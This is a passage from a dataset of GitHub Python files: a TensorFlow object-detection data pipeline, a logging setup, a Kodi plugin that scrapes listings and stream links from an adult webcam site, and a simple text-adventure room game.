bboxes\n\n\n@tf.function\ndef compute_inputs(sample):\n image = tf.cast(sample[\"image\"], dtype=tf.float32)\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n bboxes = tf.cast(sample[\"objects\"][\"bbox\"], dtype=tf.float32)\n classes = tf.cast(sample[\"objects\"][\"label\"], dtype=tf.float32)\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] * image_shape[1],\n bboxes[:, 1] * image_shape[0],\n bboxes[:, 2] * image_shape[1],\n bboxes[:, 3] * image_shape[0],\n ],\n axis=-1\n )\n return image, image_shape, bboxes, classes\n\n\ndef preprocess_data_v1(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n max_bboxes: int = 100,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n # image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.01)\n image, bboxes = random_flip_horizontal(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if 
config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n # return image, bboxes, bboxes_count[None], fmaps_shape\n return image, bboxes, scale, image_shape\n\n return _preprocess_data\n\n\ndef preprocess_data_v2(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.5)\n image, bboxes = random_flip_horizontal(image, image_shape, bboxes, prob=0.5)\n image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n return image, bboxes[:, :4], bboxes[:, -1], fmaps_shape\n\n return _preprocess_data\n\n\n@tf.function\ndef _compute_targets_v1(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification 
Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n # ind_target_ = tf.concat([ind_target_, tf.expand_dims(level_min_area_indices, -1)], axis=0)\n\n # ind_target_ = tf.where(tf.equal(cls_target_[..., -1], 1.), ind_target_[..., 0], -1)[..., None]\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None]\n\n\n@tf.function\ndef _compute_targets_v2(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n mk_target_ = tf.zeros((tf.shape(bboxes)[0], 0, 1), dtype=tf.float32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative 
sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n objects_mask = tf.reshape(level_cls_target[..., -1], (tf.shape(level_cls_target)[0], -1, 1))\n\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n mk_target_ = tf.concat([mk_target_, objects_mask], axis=1)\n\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None], mk_target_\n\n\ndef inputs_targets_v1(image, bboxes, 
bboxes_count, fmaps_shape):\n inputs = {\n \"image\": image,\n \"bboxes\": bboxes,\n \"bboxes_count\": bboxes_count,\n \"fmaps_shape\": fmaps_shape,\n }\n return inputs\n\n\ndef inputs_targets_v2(image, cls_target, reg_target, ind_target, bboxes_cnt):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt\n }\n return inputs\n\n\ndef inputs_targets_v3(image, cls_target, reg_target, ind_target, bboxes_cnt, mask_target, ):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt,\n \"mask_target\": mask_target,\n }\n return inputs\n\n\ndef _load_data_from_tfrecord(ds_name, path=\"D:/datasets/\"):\n if ds_name == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True)\n elif ds_name == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n elif ds_name == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n return train, test, ds_info.splits[\"train\"].num_examples, ds_info.splits[\"test\"].num_examples\n\n\ndef create_pipeline_v1(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1):\n autotune = tf.data.AUTOTUNE\n\n train, test, train_num, test_num = _load_data_from_tfrecord(db)\n\n # if db == \"DPCB\":\n # (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"C:/works/datasets/\")\n # else:\n # train = None\n # test = None\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=_fmap_shapes(phi)),\n num_parallel_calls=autotune)\n train = train.shuffle(train_num)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0, 0), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.repeat().prefetch(autotune)\n return train, test\n\n\ndef create_pipeline_v2(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n _buffer = 1000\n\n if db == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True)\n elif db == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n elif db == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n train_examples = ds_info.splits[\"train\"].num_examples\n test_examples = ds_info.splits[\"test\"].num_examples\n print(f\"[INFO] {db}: train( {train_examples} ), test( {test_examples} )\")\n\n train = train.map(preprocess_data_v2(\n phi=phi,\n mode=mode,\n fmap_shapes=_fmap_shapes(phi),\n debug=debug\n ), num_parallel_calls=autotune)\n\n train = (train.shuffle(_buffer, reshuffle_each_iteration=True).repeat())\n train = train.map(_compute_targets_v2, num_parallel_calls=autotune) # padded tensor.\n # train = train.batch(batch_size=batch_size, drop_remainder=True) # with _compute_targets_v1\n train = train.padded_batch(\n 
batch_size=batch_size,\n padding_values=(0., 0., 0., 0, 0, 0.),\n drop_remainder=True) # with _compute_targets_v2\n train = train.map(inputs_targets_v3, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n\n return train, test\n\n\ndef create_pipeline_test(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n\n if db == \"DPCB\":\n (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\")\n\n elif db == \"VOC\":\n (train, test) = tfds.load(name=\"pascal_voc\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n elif db == \"VOC_mini\":\n (train, test) = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n else:\n train = None\n test = None\n\n feature_maps_shapes = _fmap_shapes(phi)\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=feature_maps_shapes, max_bboxes=100,\n debug=debug), num_parallel_calls=autotune)\n\n train = train.shuffle(1000)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0., 0.), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n return train, test\n\n\nif __name__ == '__main__':\n eps = 10\n bs = 1\n\n train_t, test_t = create_pipeline_v2(\n phi=config.PHI,\n batch_size=bs,\n # debug=True,\n db=\"VOC\"\n )\n\n \"\"\" \"\"\"\n # for ep in range(eps):\n # for step, inputs_batch in enumerate(train_t):\n # # _cls = inputs_batch['cls_target'].numpy()\n # # _loc = inputs_batch['loc_target'].numpy()\n # # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n #\n # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {_int[:, 0]}\")\n #\n # if np.min(_int) == 0:\n # break\n #\n # # if step > (16551 // bs) - 3:\n # # min_cnt = np.min(_int)\n # # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {min_cnt}\")\n\n \"\"\" \"\"\"\n\n # iterations = 1\n # for step, inputs_batch in enumerate(train_t):\n # # if (step + 1) > iterations:\n # # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _cls = inputs_batch['cls_target'].numpy()\n # _loc = inputs_batch['loc_target'].numpy()\n # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n # _mks = inputs_batch['mask_target'].numpy()\n #\n # if _int > 15:\n # break\n #\n # obj_cnt = _int[0, 0]\n # p7_mk = np.reshape(_cls[0, 8500:, -1], (5, 5))\n # p6_mk = np.reshape(_cls[0, 8400:8500, -1], (10, 10))\n # p5_mk = np.reshape(_cls[0, 8000:8400, -1], (20, 20))\n #\n # p7_mk_obj = np.reshape(_mks[0, :, 8500:, 0], (obj_cnt, 5, 5))\n # p6_mk_obj = np.reshape(_mks[0, :, 8400:8500, 0], (obj_cnt, 10, 10))\n # p5_mk_obj = np.reshape(_mks[0, :, 8000:8400, 0], (obj_cnt, 20, 20))\n #\n # p7_ap = np.reshape(_cls[0, 8500:, -2], (5, 5))\n # p6_ap = np.reshape(_cls[0, 8400:8500, -2], (10, 10))\n # p5_ap = np.reshape(_cls[0, 8000:8400, -2], (20, 20))\n #\n # p7_ind = np.reshape(_ind[0, 8500:], (5, 5))\n # p6_ind = np.reshape(_ind[0, 8400:8500], (10, 10))\n # p5_ind = np.reshape(_ind[0, 8000:8400], (20, 20))\n\n \"\"\" \"\"\"\n\n # import matplotlib.pyplot as plt\n #\n # iterations = 10\n # print('test')\n # plt.figure(figsize=(10, 8))\n # for step, inputs_batch in enumerate(train_t):\n # if (step + 1) > iterations:\n # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _images = inputs_batch['image'].numpy()\n # 
_bboxes = inputs_batch['bboxes'].numpy()\n # _scales = inputs_batch['bboxes_count'].numpy()\n # _images_shape = inputs_batch['fmaps_shape'].numpy()\n #\n # _bboxes = tf.stack(\n # [\n # _bboxes[..., 1],\n # _bboxes[..., 0],\n # _bboxes[..., 3],\n # _bboxes[..., 2],\n # ],\n # axis=-1\n # )\n #\n # colors = np.array([[255.0, 0.0, 0.0]])\n # _images = tf.image.draw_bounding_boxes(\n # _images,\n # _bboxes,\n # colors=colors\n # )\n #\n # for i in range(bs):\n # plt.subplot(2, 2, i + 1)\n # plt.imshow(_images[i].numpy().astype(\"uint8\"))\n # # print(bboxes[i])\n # plt.tight_layout()\n # plt.pause(1)\n # # plt.close()\n\n \"\"\" \"\"\"\n\n # tfds.benchmark(train_t, batch_size=bs)\n # tfds.benchmark(train_t, batch_size=bs)\n\n # image : (Batch, None, None, 3)\n # bboxes : (Batch, None, 5)\n # bboxes_count : (Batch, 1)\n # fmaps_shape : (Batch, 5, 2)\n","repo_name":"gogo12235LYH/keras-sapd-v2","sub_path":"generators/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":33825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"9432759477","text":"import logging\r\n\r\nlogger = logging.Logger(name=\"APP\", level=logging.DEBUG)\r\n\r\nformatter = logging.Formatter(\"%(name)s:%(levelname)s: %(message)s\")\r\n\r\nconsole_handler = logging.StreamHandler()\r\nconsole_handler.setLevel(logging.CRITICAL)\r\nconsole_handler.setFormatter(formatter)\r\n\r\n\r\nfile_handler = logging.FileHandler(\"vkf.log\")\r\nfile_handler.setLevel(logging.DEBUG)\r\nfile_handler.setFormatter(formatter)\r\n\r\n\r\nlogger.addHandler(console_handler)\r\nlogger.addHandler(file_handler)\r\n","repo_name":"Saegl/vkf","sub_path":"vkf/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32722464839","text":"# -*- coding: utf-8 -*-\n# Author: Lord Grey\n# Created : 01.03.2019\n# License: GPL v.3 https://www.gnu.org/copyleft/gpl.html\n\nimport re\nimport xbmcgui\nimport xbmcplugin\nimport resources.lib.helper as helper\n\n\ndef get_cats():\n\t\"\"\"\n\tcrawls the categories from chaturbate.com\n\tand returns them as a list of dicts\n\n\t[{'category': 'Pornos auf Deutsch', 'link': 'https://xvideos.com/lang/deutsch'},\n\t {'category': '3d', 'link': 'https://xvideos.com/?k=3d&top'}]\n\t\"\"\"\n\turl = 'https://chaturbate.com'\n\tcats = []\n\tsoup = helper.get_soup(url)\n\tul = soup.find(\"ul\", class_=\"sub-nav\")\n\n\tfor li in ul.find_all(\"li\"):\n\t\tcats.append(\n\t\t\tdict([\n\t\t\t\t('category', li.text),\n\t\t\t\t('link', url + li.a.get('href'))\n\t\t\t]))\n\n\treturn cats\n\n\ndef get_vids(url, category='none'):\n\t\"\"\"\n\tcrawls a given url from chaturbate.com for videos\n\tand returns them as a list of dicts\n\tif a category is given it will be added to the dict\n\n\ta returned dict looks like this\n\t\t KEYS VALUE\n\t[{ 'title': 'BF HAVE 8 INC BUT YOUR ',\n\t\t'link': 'https://chaturbate.com/nasty_girl_masturbate',\n\t'duration': '5 min',\n\t 'thumb': 'https://img-hw.com/videos/thumbs169/a3/ed/36/a3ed367bcb5a69a9ad.14.jpg',\n\t\t 'res': '720p',\n\t 'views': '13k',\n\t'uploader': 'hans',\n\t'category': 'Grany'}]\n\t\"\"\"\n\n\thardcoded = 'https://chaturbate.com'\n\tvideo_info = []\n\tvideos = []\n\n\tsoup = helper.get_soup(url)\n\n\tvideos = soup.find_all(\"li\", class_=\"room_list_room\")\n\n\tfor info in videos:\n\t\tres = ''\n\t\ttitle = info.find(\"a\", href=True).get('href')[1:-1]\n\t\tuploader = info.find(\"a\", href=True).get('href')\n\t\timg = info.find(\"a\", href=True).find('img').get('src')\n\n\t\t# views and time are only separated by \",\" on the site\n\t\tduraview = info.find(\"li\", class_=\"cams\").text.split(\",\")\n\t\tviews = duraview[1]\n\n\t\t# if duraview[0].find(\"h\") != -1: #\n\t\t# h = float(duraview[0][:-4])\n\t\t# duration = (h * 60) * 60\n\n\t\t# else:\n\t\t# duration = duraview[0][:-5] * 60\n\n\t\tvideo_info.append(\n\t\t\tdict([\n\t\t\t\t('title', title),\n\t\t\t\t('link', hardcoded + uploader),\n\t\t\t\t('duration', 0),\n\t\t\t\t('thumb', img),\n\t\t\t\t('res', res),\n\t\t\t\t('views', views),\n\t\t\t\t('uploader', title),\n\t\t\t\t('category', category)\n\t\t\t]))\n\treturn video_info\n\n\ndef play_video(_handle, video):\n\t\"\"\"\n\tPlay a video by the provided path.\n\n\t:param video: Fully-qualified video URL\n\t:type video: str\n\t\"\"\"\n\n\tsoup = helper.get_soup(video)\n\tpattern = r\"\"\"https.*\\.m3u8\"\"\"\n\tlink = re.findall(pattern, str(soup))[0].replace(r'\\u002D', '-')\n\n\t# Create a playable item with a path to play.\n\tplay_item = xbmcgui.ListItem(path=link)\n\n\t# Pass the item to the Kodi player.\n\txbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)\n","repo_name":"Space2Walker/plugin.video.chaturbate","sub_path":"resources/lib/chaturbate.py","file_name":"chaturbate.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34195573405","text":"rooms = {'1':{'name':'room1', 'description':'this is room one ', 'exit':{'east': '2', 'south': '4'}, 'invent':[]},\n '2':{'name':'room2', 'description':'this is room two ', 'exit':{'west': '1','east': '3','south': '5'}, 'invent':[]},\n '3':{'name':'room3', 'description':'this is room three ', 'exit':{'west': '2','south': '6'}, 'invent':[]},\n '4':{'name':'room4', 'description':'this is room four ', 'exit':{'north': '1','south': '7','east': '5'}, 'invent':['macbook']},\n '5':{'name':'room5', 'description':'this is room five ', 'exit':{'north': '2','south': '8','east': '6','west': '4'}, 'invent':['food']},\n '6':{'name':'room6', 'description':'this is room six ', 'exit':{'west': '5','south': '9','north': '3'}, 'invent':['botle']},\n '7':{'name':'room7', 'description':'this is room seven ', 'exit':{'north': '4','east': '8'}, 'invent':[]},\n '8':{'name':'room8', 'description':'this is room eight ', 'exit':{'north': '5','east': '9','west': '7'}, 'invent':['book']},\n '9':{'name':'room9', 'description':'this is room nine ', 'exit':{'north': '6', 'west': '8'}, 'invent':[]},\n }\n\n\n\nchar = {'position':'1', 'invent':['apple']}\n\n#1 2 3\n#4 5 6\n#7 8 9\n\n\ndef move(direction):\n global char\n position=char['position']\n room_id=rooms[position]['exit']\n if room_id.get(direction):\n char['position']=str(room_id.get(direction))\n describe_room()\n else:\n print(\"No such exit\")\n\n\ndef describe_room(arg=None):\n id=char['position']\n print(\"___________\\n|{0} \\n|Description: {1}\\n|Invents: {2}\\n___________\".format(rooms[id]['name'], rooms[id]['description'], rooms[id]['invent']))\n\n\ndef describe_pocket(arg=None):\n print(\"Your pocket has: {0}\".format(char['invent']))\n\n\ndef describe_handlers(arg=None):\n print(\"Handler list:\")\n for i in handlers.keys():\n print(\"- \" + i)\n\n\ndef describe_room_directions(arg=None):\n id = char['position']\n exits = rooms[id]['exit']\n for i in exits:\n room_id = exits[i]\n print(i, rooms[room_id]['name'])\n\n\ndef move_invent(move_from, move_to):\n if len(move_from) > 0:\n thing = str(input(\"What to take hare? \"))\n if thing in move_from:\n move_from.remove(thing)\n move_to.append(thing)\n return thing\n else:\n return False\n else:\n return False\n\n\ndef put(arg=None):\n movement=move_invent(char['invent'], rooms[char['position']]['invent'])\n if movement:\n print(\"You lef \" + movement + \" in this room\")\n else:\n print(\"You don't have it\")\n\n\ndef take(arg=None):\n movement=move_invent(rooms[char['position']]['invent'], char['invent'])\n if movement:\n print(\"You took \"+ movement + \" in this room\")\n else:\n print(\"No such thing in this room\")\n\n\nhandlers = {'list': describe_handlers,\n 'look_room': describe_room,\n 'look_pocket': describe_pocket,\n 'directions': describe_room_directions,\n 'put': put,\n 'take': take,\n 'west':move,\n 'east':move,\n 'north':move,\n 'south':move}\n\n\ndef main():\n describe_handlers()\n\n while True:\n command = input(\"Do your choice \")\n\n if len(command) != 0 and handlers.get(command.split()[0]):\n handlers[command.split()[0]](command)\n else:\n print(\"No such choice, please try something from list\")\n\nmain()\n","repo_name":"vprotsenko/python-","sub_path":"homework/lesson16/rooms.py","file_name":"rooms.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
